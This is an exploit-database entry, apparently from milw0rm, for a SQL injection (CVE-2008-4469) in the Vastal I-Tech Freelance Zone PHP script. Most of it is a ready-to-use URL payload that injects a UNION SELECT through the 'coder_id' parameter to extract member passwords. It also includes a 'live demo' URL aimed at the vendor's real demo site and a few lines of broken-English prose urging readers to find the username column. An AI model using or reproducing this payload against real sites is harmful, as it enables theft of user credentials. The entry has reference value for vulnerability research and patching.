[] NeoSense

Vastal I-Tech Freelance Zone - 'coder_id' SQL Injection

Author: Stack
type: webapps
platform: php
port: 
date_added: 2008-09-04 
date_updated: 2016-12-21 
verified: 1 
codes: OSVDB-48130;CVE-2008-4469 
tags: 
aliases:  
screenshot_url:  
application_url: 

#######################################################
#  Vastal I-Tech Freelance Zone SQL Injection Vulnerability
#
# Author   : Stack
#
#
# Script Home Page : http://www.vastal.com/freelance-zone-freelance-auction-script.html
#
# Demo      : http://www.vastal.com/freelance/
#######################################################
the exploit fate the password
use ur mind for have the column username
Exploit:
http://site.il/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
Live Demo
http://www.vastal.com/freelance/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*

# milw0rm.com [2008-09-05]